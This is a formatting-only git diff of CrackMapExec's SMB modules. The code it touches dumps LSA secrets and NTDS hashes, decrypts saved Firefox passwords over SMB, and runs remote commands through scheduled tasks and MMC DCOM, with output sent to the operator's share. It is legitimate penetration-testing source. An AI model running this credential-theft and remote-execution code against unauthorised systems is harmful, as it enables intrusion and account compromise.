self.logger.highlight(f"[{credential.winuser}][FIREFOX] {url} {credential.username}:{credential.password}") self.db.add_dpapi_secrets( target.address, "FIREFOX", @@ -2147,9 +1931,7 @@ class smb(connection): LSA.exportCached(self.output_filename) LSA.dumpSecrets() LSA.exportSecrets(self.output_filename) - self.logger.success( - f"Dumped {highlight(add_lsa_secret.secrets)} LSA secrets to {self.output_filename + '.secrets'} and {self.output_filename + '.cached'}" - ) + self.logger.success(f"Dumped {highlight(add_lsa_secret.secrets)} LSA secrets to {self.output_filename + '.secrets'} and {self.output_filename + '.cached'}") try: self.remote_ops.finish() except Exception as e: @@ -2182,16 +1964,12 @@ class smb(connection): username, _, lmhash, nthash, _, _, _ = hash.split(":") parsed_hash = ":".join((lmhash, nthash)) if validate_ntlm(parsed_hash): - self.db.add_credential( - "hash", domain, username, parsed_hash, pillaged_from=host_id - ) + self.db.add_credential("hash", domain, username, parsed_hash, pillaged_from=host_id) add_ntds_hash.added_to_db += 1 return raise except: - self.logger.debug( - "Dumped hash is not NTLM, not adding to db for now ;)" - ) + self.logger.debug("Dumped hash is not NTLM, not adding to db for now ;)") else: self.logger.debug("Dumped hash is a computer account, not adding to db") @@ -2227,26 +2005,16 @@ class smb(connection): outputFileName=self.output_filename, justUser=self.args.userntds if 
self.args.userntds else None, printUserStatus=True, - perSecretCallback=lambda secret_type, secret: add_ntds_hash( - secret, host_id - ), + perSecretCallback=lambda secret_type, secret: add_ntds_hash(secret, host_id), ) try: - self.logger.success( - "Dumping the NTDS, this could take a while so go grab a redbull..." - ) + self.logger.success("Dumping the NTDS, this could take a while so go grab a redbull...") NTDS.dump() ntds_outfile = f"{self.output_filename}.ntds" - self.logger.success( - f"Dumped {highlight(add_ntds_hash.ntds_hashes)} NTDS hashes to {ntds_outfile} of which {highlight(add_ntds_hash.added_to_db)} were added to the database" - ) - self.logger.display( - "To extract only enabled accounts from the output file, run the following command: " - ) - self.logger.display( - f"cat {ntds_outfile} | grep -iv disabled | cut -d ':' -f1" - ) + self.logger.success(f"Dumped {highlight(add_ntds_hash.ntds_hashes)} NTDS hashes to {ntds_outfile} of which {highlight(add_ntds_hash.added_to_db)} were added to the database") + self.logger.display("To extract only enabled accounts from the output file, run the following command: ") + self.logger.display(f"cat {ntds_outfile} | grep -iv disabled | cut -d ':' -f1") self.logger.display(f"grep -iv disabled {ntds_outfile} | cut -d ':' -f1") except Exception as e: # if str(e).find('ERROR_DS_DRA_BAD_DN') >= 0: diff --git a/cme/protocols/smb/atexec.py b/cme/protocols/smb/atexec.py index c97ea2f2..36d607a0 100755 --- a/cme/protocols/smb/atexec.py +++ b/cme/protocols/smb/atexec.py @@ -156,9 +156,7 @@ class TSCH_EXEC: logging.info(f"Task XML: {xml}") taskCreated = False logging.info(f"Creating task \\{tmpName}") - tsch.hSchRpcRegisterTask( - dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE - ) + tsch.hSchRpcRegisterTask(dce, f"\\{tmpName}", xml, tsch.TASK_CREATE, NULL, tsch.TASK_LOGON_NONE) taskCreated = True logging.info(f"Running task \\{tmpName}") @@ -184,24 +182,18 @@ class TSCH_EXEC: if fileless: while True: try: - with open( - os.path.join("/tmp", "cme_hosted", tmpFileName), "r" - ) as output: + with open(os.path.join("/tmp", "cme_hosted", tmpFileName), "r") as output: self.output_callback(output.read()) break except IOError: sleep(2) else: - peer = ":".join( - map(str, self.__rpctransport.get_socket().getpeername()) - ) + peer = ":".join(map(str, self.__rpctransport.get_socket().getpeername())) smbConnection = self.__rpctransport.get_smb_connection() while True: try: logging.info(f"Attempting to read ADMIN$\\Temp\\{tmpFileName}") - smbConnection.getFile( - "ADMIN$", f"Temp\\{tmpFileName}", self.output_callback - ) + smbConnection.getFile("ADMIN$", f"Temp\\{tmpFileName}", self.output_callback) break except Exception as e: if str(e).find("SHARING") > 0: diff --git a/cme/protocols/smb/database.py b/cme/protocols/smb/database.py index 982e3ff2..d0a97e74 100755 --- a/cme/protocols/smb/database.py +++ b/cme/protocols/smb/database.py @@ -153,40 +153,17 @@ class database: def reflect_tables(self): with self.db_engine.connect() as conn: try: - self.HostsTable = Table( - "hosts", self.metadata, autoload_with=self.db_engine - ) - self.UsersTable = Table( - "users", self.metadata, autoload_with=self.db_engine - ) - self.GroupsTable = Table( - "groups", self.metadata, autoload_with=self.db_engine - ) - self.SharesTable = Table( - "shares", self.metadata, autoload_with=self.db_engine - ) - self.AdminRelationsTable = Table( - "admin_relations", self.metadata, autoload_with=self.db_engine - ) - self.GroupRelationsTable = Table( - 
"group_relations", self.metadata, autoload_with=self.db_engine - ) - self.LoggedinRelationsTable = Table( - "loggedin_relations", self.metadata, autoload_with=self.db_engine - ) - self.DpapiSecrets = Table( - "dpapi_secrets", self.metadata, autoload_with=self.db_engine - ) - self.DpapiBackupkey = Table( - "dpapi_backupkey", self.metadata, autoload_with=self.db_engine - ) + self.HostsTable = Table("hosts", self.metadata, autoload_with=self.db_engine) + self.UsersTable = Table("users", self.metadata, autoload_with=self.db_engine) + self.GroupsTable = Table("groups", self.metadata, autoload_with=self.db_engine) + self.SharesTable = Table("shares", self.metadata, autoload_with=self.db_engine) + self.AdminRelationsTable = Table("admin_relations", self.metadata, autoload_with=self.db_engine) + self.GroupRelationsTable = Table("group_relations", self.metadata, autoload_with=self.db_engine) + self.LoggedinRelationsTable = Table("loggedin_relations", self.metadata, autoload_with=self.db_engine) + self.DpapiSecrets = Table("dpapi_secrets", self.metadata, autoload_with=self.db_engine) + self.DpapiBackupkey = Table("dpapi_backupkey", self.metadata, autoload_with=self.db_engine) except (NoInspectionAvailable, NoSuchTableError): - print( - "[-] Error reflecting tables - this means there is a DB schema mismatch \n" - "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" - "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" - "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema" - ) + print("[-] Error reflecting tables - this means there is a DB schema mismatch \n" "[-] This is probably because a newer version of CME is being ran on an old DB schema\n" "[-] If you wish to save the old DB data, copy it to a new location (`cp -r ~/.cme/workspaces/ ~/old_cme_workspaces/`)\n" "[-] Then remove the CME DB folders (`rm -rf ~/.cme/workspaces/`) and rerun CME to initialize the new DB schema") exit() def shutdown_db(self): @@ -275,9 +252,7 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.HostsTable) # .returning(self.HostsTable.c.id) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.HostsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.HostsTable.primary_key, set_=update_columns) self.conn.execute(q, hosts) # .scalar() # we only return updated IDs for now - when RETURNING clause is allowed we can return inserted @@ -285,9 +260,7 @@ class database: cme_logger.debug(f"add_host() - Host IDs Updated: {updated_ids}") return updated_ids - def add_credential( - self, credtype, domain, username, password, group_id=None, pillaged_from=None - ): + def add_credential(self, credtype, domain, username, password, group_id=None, pillaged_from=None): """ Check if this credential has already been added to the database, if not add it in. 
""" @@ -295,9 +268,7 @@ class database: credentials = [] groups = [] - if (group_id and not self.is_group_valid(group_id)) or ( - pillaged_from and not self.is_host_valid(pillaged_from) - ): + if (group_id and not self.is_group_valid(group_id)) or (pillaged_from and not self.is_host_valid(pillaged_from)): cme_logger.debug(f"Invalid group or host") return @@ -344,12 +315,8 @@ class database: # TODO: find a way to abstract this away to a single Upsert call q_users = Insert(self.UsersTable) # .returning(self.UsersTable.c.id) - update_columns_users = { - col.name: col for col in q_users.excluded if col.name not in "id" - } - q_users = q_users.on_conflict_do_update( - index_elements=self.UsersTable.primary_key, set_=update_columns_users - ) + update_columns_users = {col.name: col for col in q_users.excluded if col.name not in "id"} + q_users = q_users.on_conflict_do_update(index_elements=self.UsersTable.primary_key, set_=update_columns_users) cme_logger.debug(f"Adding credentials: {credentials}") self.conn.execute(q_users, credentials) # .scalar() @@ -408,13 +375,9 @@ class database: def get_admin_relations(self, user_id=None, host_id=None): if user_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.userid == user_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.userid == user_id) elif host_id: - q = select(self.AdminRelationsTable).filter( - self.AdminRelationsTable.c.hostid == host_id - ) + q = select(self.AdminRelationsTable).filter(self.AdminRelationsTable.c.hostid == host_id) else: q = select(self.AdminRelationsTable) @@ -454,9 +417,7 @@ class database: # if we're filtering by username elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = select(self.UsersTable).filter( - func.lower(self.UsersTable.c.username).like(like_term) - ) + q = select(self.UsersTable).filter(func.lower(self.UsersTable.c.username).like(like_term)) # otherwise return all credentials else: q = select(self.UsersTable) @@ -477,15 +438,11 @@ class database: return results.id def is_credential_local(self, credential_id): - q = select(self.UsersTable.c.domain).filter( - self.UsersTable.c.id == credential_id - ) + q = select(self.UsersTable.c.domain).filter(self.UsersTable.c.id == credential_id) user_domain = self.conn.execute(q).all() if user_domain: - q = select(self.HostsTable).filter( - func.lower(self.HostsTable.c.id) == func.lower(user_domain) - ) + q = select(self.HostsTable).filter(func.lower(self.HostsTable.c.id) == func.lower(user_domain)) results = self.conn.execute(q).all() return len(results) > 0 @@ -531,10 +488,7 @@ class database: # if we're filtering by ip/hostname elif filter_term and filter_term != "": like_term = func.lower(f"%{filter_term}%") - q = q.filter( - self.HostsTable.c.ip.like(like_term) - | func.lower(self.HostsTable.c.hostname).like(like_term) - ) + q = q.filter(self.HostsTable.c.ip.like(like_term) | func.lower(self.HostsTable.c.hostname).like(like_term)) results = self.conn.execute(q).all() cme_logger.debug(f"smb hosts() - results: {results}") return results @@ -578,9 +532,7 @@ class database: q = Insert(self.GroupsTable) self.conn.execute(q, groups) - new_group_data = self.get_groups( - group_name=group_data["name"], group_domain=group_data["domain"] - ) + new_group_data = self.get_groups(group_name=group_data["name"], group_domain=group_data["domain"]) returned_id = [new_group_data[0].id] cme_logger.debug(f"Inserted group with ID: {returned_id[0]}") return returned_id @@ -608,9 +560,7 @@ class 
database: # TODO: find a way to abstract this away to a single Upsert call q = Insert(self.GroupsTable) # .returning(self.GroupsTable.c.id) update_columns = {col.name: col for col in q.excluded if col.name not in "id"} - q = q.on_conflict_do_update( - index_elements=self.GroupsTable.primary_key, set_=update_columns - ) + q = q.on_conflict_do_update(index_elements=self.GroupsTable.primary_key, set_=update_columns) self.conn.execute(q, groups) # TODO: always return a list and fix code references to not expect a single integer @@ -648,9 +598,7 @@ class database: results = self.conn.execute(q).all() - cme_logger.debug( - f"get_groups(filter_term={filter_term}, groupName={group_name}, groupDomain={group_domain}) => {results}" - ) + cme_logger.debug(f"get_groups(filter_term={filter_term}, groupName={group_name}, groupDomain={group_domain}) => {results}") return results def get_group_relations(self, user_id=None, group_id=None): @@ -660,13 +608,9 @@ class database: self.GroupRelationsTable.c.groupid == group_id, ) elif user_id: - q = select(self.GroupRelationsTable).filter( - self.GroupRelationsTable.c.id == user_id - ) + q = select(self.GroupRelationsTable).filter(self.GroupRelationsTable.c.id == user_id) elif group_id: - q = select(self.GroupRelationsTable).filter( - self.GroupRelationsTable.c.groupid == group_id - ) + q = select(self.GroupRelationsTable).filter(self.GroupRelationsTable.c.groupid == group_id) results = self.conn.execute(q).all() return results @@ -730,9 +674,7 @@ class database: "write": write, } share_id = self.conn.execute( - Insert( - self.SharesTable - ).on_conflict_do_nothing(), # .returning(self.SharesTable.c.id), + Insert(self.SharesTable).on_conflict_do_nothing(), # .returning(self.SharesTable.c.id), share_data, ) # .scalar_one() # return share_id @@ -762,9 +704,7 @@ class database: def get_users_with_share_access(self, host_id, share_name, permissions): permissions = permissions.lower() - q = select(self.SharesTable.c.userid).filter( - self.SharesTable.c.name == share_name, self.SharesTable.c.hostid == host_id - ) + q = select(self.SharesTable.c.userid).filter(self.SharesTable.c.name == share_name, self.SharesTable.c.hostid == host_id) if "r" in permissions: q = q.filter(self.SharesTable.c.read == 1) if "w" in permissions: @@ -779,9 +719,7 @@ class database: :domain is the domain fqdn :pvk is the domain backupkey """ - q = select(self.DpapiBackupkey).filter( - func.lower(self.DpapiBackupkey.c.domain) == func.lower(domain) - ) + q = select(self.DpapiBackupkey).filter(func.lower(self.DpapiBackupkey.c.domain) == func.lower(domain)) results = self.conn.execute(q).all() if not len(results): @@ -792,9 +730,7 @@ class database: q = Insert(self.DpapiBackupkey) # .returning(self.DpapiBackupkey.c.id) self.conn.execute(q, [backup_key]) # .scalar() - cme_logger.debug( - f"add_domain_backupkey(domain={domain}, pvk={pvk_encoded})" - ) + cme_logger.debug(f"add_domain_backupkey(domain={domain}, pvk={pvk_encoded})") # return inserted_id except Exception as e: cme_logger.debug(f"Issue while inserting DPAPI Backup Key: {e}") @@ -812,10 +748,7 @@ class database: cme_logger.debug(f"get_domain_backupkey(domain={domain}) => {results}") if len(results) > 0: - results = [ - (id_key, domain, base64.b64decode(pvk)) - for id_key, domain, pvk in results - ] + results = [(id_key, domain, base64.b64decode(pvk)) for id_key, domain, pvk in results] return results def is_dpapi_secret_valid(self, dpapi_secret_id): @@ -823,9 +756,7 @@ class database: Check if this group ID is valid. 
:dpapi_secret_id is a primary id """ - q = select(self.DpapiSecrets).filter( - func.lower(self.DpapiSecrets.c.id) == dpapi_secret_id - ) + q = select(self.DpapiSecrets).filter(func.lower(self.DpapiSecrets.c.id) == dpapi_secret_id) results = self.conn.execute(q).first() valid = True if results is not None else False cme_logger.debug(f"is_dpapi_secret_valid(groupID={dpapi_secret_id}) => {valid}") @@ -851,18 +782,14 @@ class database: "password": password, "url": url, } - q = Insert( - self.DpapiSecrets - ).on_conflict_do_nothing() # .returning(self.DpapiSecrets.c.id) + q = Insert(self.DpapiSecrets).on_conflict_do_nothing() # .returning(self.DpapiSecrets.c.id) self.conn.execute(q, [secret]) # .scalar() # inserted_result = res_inserted_result.first() # inserted_id = inserted_result.id - cme_logger.debug( - f"add_dpapi_secrets(host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, password={password}, url={url})" - ) + cme_logger.debug(f"add_dpapi_secrets(host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, password={password}, url={url})") def get_dpapi_secrets( self, @@ -889,9 +816,7 @@ class database: # all() returns a list, so we keep the return format the same so consumers don't have to guess return [results] elif dpapi_type: - q = q.filter( - func.lower(self.DpapiSecrets.c.dpapi_type) == func.lower(dpapi_type) - ) + q = q.filter(func.lower(self.DpapiSecrets.c.dpapi_type) == func.lower(dpapi_type)) elif windows_user: like_term = func.lower(f"%{windows_user}%") q = q.filter(func.lower(self.DpapiSecrets.c.windows_user).like(like_term)) @@ -902,9 +827,7 @@ class database: q = q.filter(func.lower(self.DpapiSecrets.c.url) == func.lower(url)) results = self.conn.execute(q).all() - cme_logger.debug( - f"get_dpapi_secrets(filter_term={filter_term}, host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, url={url}) => {results}" - ) + cme_logger.debug(f"get_dpapi_secrets(filter_term={filter_term}, host={host}, dpapi_type={dpapi_type}, windows_user={windows_user}, username={username}, url={url}) => {results}") return results def add_loggedin_relation(self, user_id, host_id): @@ -920,23 +843,17 @@ class database: try: cme_logger.debug(f"Inserting loggedin_relations: {relation}") # TODO: find a way to abstract this away to a single Upsert call - q = Insert( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = Insert(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) self.conn.execute(q, [relation]) # .scalar() inserted_id_results = self.get_loggedin_relations(user_id, host_id) - cme_logger.debug( - f"Checking if relation was added: {inserted_id_results}" - ) + cme_logger.debug(f"Checking if relation was added: {inserted_id_results}") return inserted_id_results[0].id except Exception as e: cme_logger.debug(f"Error inserting LoggedinRelation: {e}") def get_loggedin_relations(self, user_id=None, host_id=None): - q = select( - self.LoggedinRelationsTable - ) # .returning(self.LoggedinRelationsTable.c.id) + q = select(self.LoggedinRelationsTable) # .returning(self.LoggedinRelationsTable.c.id) if user_id: q = q.filter(self.LoggedinRelationsTable.c.userid == user_id) if host_id: diff --git a/cme/protocols/smb/db_navigator.py b/cme/protocols/smb/db_navigator.py index c891d0af..5b96d573 100644 --- a/cme/protocols/smb/db_navigator.py +++ b/cme/protocols/smb/db_navigator.py @@ -51,9 +51,7 @@ class navigator(DatabaseNavigator): members = 
len(self.db.get_group_relations(group_id=group_id)) ad_members = group[4] last_query_time = group[5] - data.append( - [group_id, domain, name, rid, members, ad_members, last_query_time] - ) + data.append([group_id, domain, name, rid, members, ad_members, last_query_time]) print_table(data, title="Groups") # pull/545 @@ -126,12 +124,8 @@ class navigator(DatabaseNavigator): name = share[3] remark = share[4] - users_r_access = self.db.get_users_with_share_access( - host_id=host_id, share_name=name, permissions="r" - ) - users_w_access = self.db.get_users_with_share_access( - host_id=host_id, share_name=name, permissions="w" - ) + users_r_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="r") + users_w_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="w") data.append( [ share_id, @@ -165,12 +159,8 @@ class navigator(DatabaseNavigator): name = share[3] remark = share[4] - users_r_access = self.db.get_users_with_share_access( - host_id=host_id, share_name=name, permissions="r" - ) - users_w_access = self.db.get_users_with_share_access( - host_id=host_id, share_name=name, permissions="w" - ) + users_r_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="r") + users_w_access = self.db.get_users_with_share_access(host_id=host_id, share_name=name, permissions="w") data = [["ShareID", "Name", "Remark"], [share_id, name, remark]] print_table(data, title="Share") @@ -266,9 +256,7 @@ class navigator(DatabaseNavigator): creds = self.db.get_credentials(filter_term=userid) for cred in creds: - data.append( - [cred[0], cred[4], cred[5], cred[1], cred[2], cred[3]] - ) + data.append([cred[0], cred[4], cred[5], cred[1], cred[2], cred[3]]) print_table(data, title="Member(s)") def help_groups(self): @@ -644,13 +632,7 @@ class navigator(DatabaseNavigator): print_help(help_string) def do_clear_database(self, line): - if ( - input( - "This will destroy all data in the current database, are you SURE you" - " want to run this? (y/n): " - ) - == "y" - ): + if input("This will destroy all data in the current database, are you SURE you" " want to run this? 
(y/n): ") == "y": self.db.clear_database() def help_clear_database(self): diff --git a/cme/protocols/smb/firefox.py b/cme/protocols/smb/firefox.py index 9942ef97..bd889aa6 100644 --- a/cme/protocols/smb/firefox.py +++ b/cme/protocols/smb/firefox.py @@ -62,42 +62,24 @@ class FirefoxTriage: users = self.get_users() for user in users: try: - directories = self.conn.remote_list_dir( - share=self.share, path=self.firefox_generic_path.format(user) - ) + directories = self.conn.remote_list_dir(share=self.share, path=self.firefox_generic_path.format(user)) except Exception as e: if "STATUS_OBJECT_PATH_NOT_FOUND" in str(e): continue self.logger.debug(e) if directories is None: continue - for d in [ - d - for d in directories - if d.get_longname() not in self.false_positive and d.is_directory() > 0 - ]: + for d in [d for d in directories if d.get_longname() not in self.false_positive and d.is_directory() > 0]: try: - logins_path = ( - self.firefox_generic_path.format(user) - + "\\" - + d.get_longname() - + "\\logins.json" - ) + logins_path = self.firefox_generic_path.format(user) + "\\" + d.get_longname() + "\\logins.json" logins_data = self.conn.readFile(self.share, logins_path) if logins_data is None: continue # No logins.json file found logins = self.get_login_data(logins_data=logins_data) if len(logins) == 0: continue # No logins profile found - key4_path = ( - self.firefox_generic_path.format(user) - + "\\" - + d.get_longname() - + "\\key4.db" - ) - key4_data = self.conn.readFile( - self.share, key4_path, bypass_shared_violation=True - ) + key4_path = self.firefox_generic_path.format(user) + "\\" + d.get_longname() + "\\key4.db" + key4_data = self.conn.readFile(self.share, key4_path, bypass_shared_violation=True) if key4_data is None: continue key = self.get_key(key4_data=key4_data) @@ -109,12 +91,8 @@ class FirefoxTriage: if key is None: continue for username, pwd, host in logins: - decoded_username = self.decrypt( - key=key, iv=username[1], ciphertext=username[2] - ).decode("utf-8") - password = self.decrypt( - key=key, iv=pwd[1], ciphertext=pwd[2] - ).decode("utf-8") + decoded_username = self.decrypt(key=key, iv=username[1], ciphertext=username[2]).decode("utf-8") + password = self.decrypt(key=key, iv=pwd[1], ciphertext=pwd[2]).decode("utf-8") if password is not None and decoded_username is not None: firefox_data.append( FirefoxData( @@ -154,9 +132,7 @@ class FirefoxTriage: row = next(cursor) if row: - global_salt, master_password, _ = self.is_master_password_correct( - key_data=row, master_password=master_password - ) + global_salt, master_password, _ = self.is_master_password_correct(key_data=row, master_password=master_password) if global_salt: try: cursor.execute("SELECT a11,a102 FROM nssPrivate;") @@ -167,9 +143,7 @@ class FirefoxTriage: a102 = row[1] if a102 == CKA_ID: decoded_a11 = decoder.decode(a11) - key = self.decrypt_3des( - decoded_a11, master_password, global_salt - ) + key = self.decrypt_3des(decoded_a11, master_password, global_salt) if key is not None: fh.close() return key[:24] @@ -185,9 +159,7 @@ class FirefoxTriage: global_salt = key_data[0] # Item1 item2 = key_data[1] decoded_item2 = decoder.decode(item2) - cleartext_data = self.decrypt_3des( - decoded_item2, master_password, global_salt - ) + cleartext_data = self.decrypt_3des(decoded_item2, master_password, global_salt) if cleartext_data != "password-check\x02\x02".encode(): return "", "", "" return global_salt, master_password, entry_salt @@ -199,9 +171,7 @@ class FirefoxTriage: users = list() users_dir_path = 
"Users\\*" - directories = self.conn.listPath( - shareName=self.share, path=ntpath.normpath(users_dir_path) - ) + directories = self.conn.listPath(shareName=self.share, path=ntpath.normpath(users_dir_path)) for d in directories: if d.get_longname() not in self.false_positive and d.is_directory() > 0: @@ -264,9 +234,7 @@ class FirefoxTriage: assert key_length == 32 k = sha1(global_salt + master_password).digest() - key = pbkdf2_hmac( - "sha256", k, entry_salt, iteration_count, dklen=key_length - ) + key = pbkdf2_hmac("sha256", k, entry_salt, iteration_count, dklen=key_length) # https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6#l6.49 iv = b"\x04\x0e" + decoded_item[0][0][1][1][1].asOctets() diff --git a/cme/protocols/smb/mmcexec.py b/cme/protocols/smb/mmcexec.py index 8ffb0d89..39b049ba 100644 --- a/cme/protocols/smb/mmcexec.py +++ b/cme/protocols/smb/mmcexec.py @@ -60,9 +60,7 @@ from impacket.dcerpc.v5.dtypes import NULL class MMCEXEC: - def __init__( - self, host, share_name, username, password, domain, smbconnection, hashes=None - ): + def __init__(self, host, share_name, username, password, domain, smbconnection, hashes=None): self.__host = host self.__username = username self.__password = password @@ -92,9 +90,7 @@ class MMCEXEC: oxidResolver=True, ) try: - iInterface = dcom.CoCreateInstanceEx( - string_to_bin("49B2791A-B1AE-4C90-9B8E-E860BA07F889"), IID_IDispatch - ) + iInterface = dcom.CoCreateInstanceEx(string_to_bin("49B2791A-B1AE-4C90-9B8E-E860BA07F889"), IID_IDispatch) iMMC = IDispatch(iInterface) resp = iMMC.GetIDsOfNames(("Document",)) @@ -104,28 +100,14 @@ class MMCEXEC: dispParams["rgdispidNamedArgs"] = NULL dispParams["cArgs"] = 0 dispParams["cNamedArgs"] = 0 - resp = iMMC.Invoke( - resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [] - ) + resp = iMMC.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], []) - iDocument = IDispatch( - self.getInterface( - iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"] - ) - ) + iDocument = IDispatch(self.getInterface(iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"])) resp = iDocument.GetIDsOfNames(("ActiveView",)) - resp = iDocument.Invoke( - resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], [] - ) + resp = iDocument.Invoke(resp[0], 0x409, DISPATCH_PROPERTYGET, dispParams, 0, [], []) - iActiveView = IDispatch( - self.getInterface( - iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"] - ) - ) - pExecuteShellCommand = iActiveView.GetIDsOfNames(("ExecuteShellCommand",))[ - 0 - ] + iActiveView = IDispatch(self.getInterface(iMMC, resp["pVarResult"]["_varUnion"]["pdispVal"]["abData"])) + pExecuteShellCommand = iActiveView.GetIDsOfNames(("ExecuteShellCommand",))[0] pQuit = iMMC.GetIDsOfNames(("Quit",))[0] @@ -177,9 +159,7 @@ class MMCEXEC: dispParams["cArgs"] = 0 dispParams["cNamedArgs"] = 0 - self.__quit[0].Invoke( - self.__quit[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [] - ) + self.__quit[0].Invoke(self.__quit[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], []) return True def execute_remote(self, data): @@ -188,11 +168,7 @@ class MMCEXEC: command = "/Q /c " + data if self.__retOutput is True: - command += ( - " 1> " - + f"\\\\{local_ip}\\{self.__share_name}\\{self.__output}" - + " 2>&1" - ) + command += " 1> " + f"\\\\{local_ip}\\{self.__share_name}\\{self.__output}" + " 2>&1" dispParams = DISPPARAMS(None, False) dispParams["rgdispidNamedArgs"] = NULL @@ -226,9 +202,7 @@ class MMCEXEC: dispParams["rgvarg"].append(arg1) dispParams["rgvarg"].append(arg0) - 
self.__executeShellCommand[0].Invoke( - self.__executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], [] - ) + self.__executeShellCommand[0].Invoke(self.__executeShellCommand[1], 0x409, DISPATCH_METHOD, dispParams, 0, [], []) self.get_output_fileless() def output_callback(self, data): @@ -240,9 +214,7 @@ class MMCEXEC: while True: try: - with open( - path_join("/tmp", "cme_hosted", self.__output), "r" - ) as output: + with open(path_join("/tmp", "cme_hosted", self.__output), "r") as output: self.output_callback(output.read()) break except IOError: diff --git a/cme/protocols/smb/passpol.py b/cme/protocols/smb/passpol.py index ea8bf592..b519708f 100644 --- a/cme/protocols/smb/passpol.py +++ b/cme/protocols/smb/passpol.py @@ -71,12 +71,8 @@ class PassPolDump: } def __init__(self, connection): - self.logger = cme_logger - self.addr = ( - connection.host - if not connection.kerberos - else connection.hostname + "." + connection.domain - ) + self.logger = connection.logger + self.addr = connection.host if not connection.kerberos else connection.hostname + "." + connection.domain self.protocol = connection.args.port self.username = connection.username self.password = connection.password @@ -176,9 +172,7 @@ class PassPolDump: domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainPasswordInformation, ) self.__min_pass_len = re["Buffer"]["Password"]["MinPasswordLength"] or "None" - self.__pass_hist_len = ( - re["Buffer"]["Password"]["PasswordHistoryLength"] or "None" - ) + self.__pass_hist_len = re["Buffer"]["Password"]["PasswordHistoryLength"] or "None" self.__max_pass_age = convert( int(re["Buffer"]["Password"]["MaxPasswordAge"]["LowPart"]), int(re["Buffer"]["Password"]["MaxPasswordAge"]["HighPart"]), @@ -194,12 +188,8 @@ class PassPolDump: domainHandle=domainHandle, domainInformationClass=samr.DOMAIN_INFORMATION_CLASS.DomainLockoutInformation, ) - self.__rst_accnt_lock_counter = convert( - 0, re["Buffer"]["Lockout"]["LockoutObservationWindow"], lockout=True - ) - self.__lock_accnt_dur = convert( - 0, re["Buffer"]["Lockout"]["LockoutDuration"], lockout=True - ) + self.__rst_accnt_lock_counter = convert(0, re["Buffer"]["Lockout"]["LockoutObservationWindow"], lockout=True) + self.__lock_accnt_dur = convert(0, re["Buffer"]["Lockout"]["LockoutDuration"], lockout=True) self.__accnt_lock_thres = re["Buffer"]["Lockout"]["LockoutThreshold"] or "None" re = samr.hSamrQueryInformationDomain2( @@ -240,26 +230,20 @@ class PassPolDump: for domain in self.__domains: cme_logger.debug(f"{domain['Name']}") - self.logger.success( - f"Dumping password info for domain: {self.__domains[0]['Name']}" - ) + self.logger.success(f"Dumping password info for domain: {self.__domains[0]['Name']}") self.logger.highlight(f"Minimum password length: {self.__min_pass_len}") self.logger.highlight(f"Password history length: {self.__pass_hist_len}") self.logger.highlight(f"Maximum password age: {self.__max_pass_age}") self.logger.highlight("") - self.logger.highlight( - f"Password Complexity Flags: {self.__pass_prop or 'None'}" - ) + self.logger.highlight(f"Password Complexity Flags: {self.__pass_prop or 'None'}") for i, a in enumerate(self.__pass_prop): self.logger.highlight(f"\t{PASSCOMPLEX[i]} {str(a)}") self.logger.highlight("") self.logger.highlight(f"Minimum password age: {self.__min_pass_age}") - self.logger.highlight( - f"Reset Account Lockout Counter: {self.__rst_accnt_lock_counter}" - ) + self.logger.highlight(f"Reset Account Lockout Counter: {self.__rst_accnt_lock_counter}") self.logger.highlight(f"Locked 
Account Duration: {self.__lock_accnt_dur}") self.logger.highlight(f"Account Lockout Threshold: {self.__accnt_lock_thres}") self.logger.highlight(f"Forced Log off Time: {self.__force_logoff_time}") diff --git a/cme/protocols/smb/remotefile.py b/cme/protocols/smb/remotefile.py index 8d85d54a..370ccfa0 100644 --- a/cme/protocols/smb/remotefile.py +++ b/cme/protocols/smb/remotefile.py @@ -20,9 +20,7 @@ class RemoteFile: self.__currentOffset = 0 def open(self): - self.__fid = self.__smbConnection.openFile( - self.__tid, self.__fileName, desiredAccess=self.__access - ) + self.__fid = self.__smbConnection.openFile(self.__tid, self.__fileName, desiredAccess=self.__access) def seek(self, offset, whence): # Implement whence, for now it's always from the beginning of the file @@ -31,9 +29,7 @@ class RemoteFile: def read(self, bytesToRead): if bytesToRead > 0: - data = self.__smbConnection.readFile( - self.__tid, self.__fid, self.__currentOffset, bytesToRead - ) + data = self.__smbConnection.readFile(self.__tid, self.__fid, self.__currentOffset, bytesToRead) self.__currentOffset += len(data) return data return "" diff --git a/cme/protocols/smb/samrfunc.py b/cme/protocols/smb/samrfunc.py index 8ba8a910..623a1728 100644 --- a/cme/protocols/smb/samrfunc.py +++ b/cme/protocols/smb/samrfunc.py @@ -16,12 +16,8 @@ from cme.logger import cme_logger 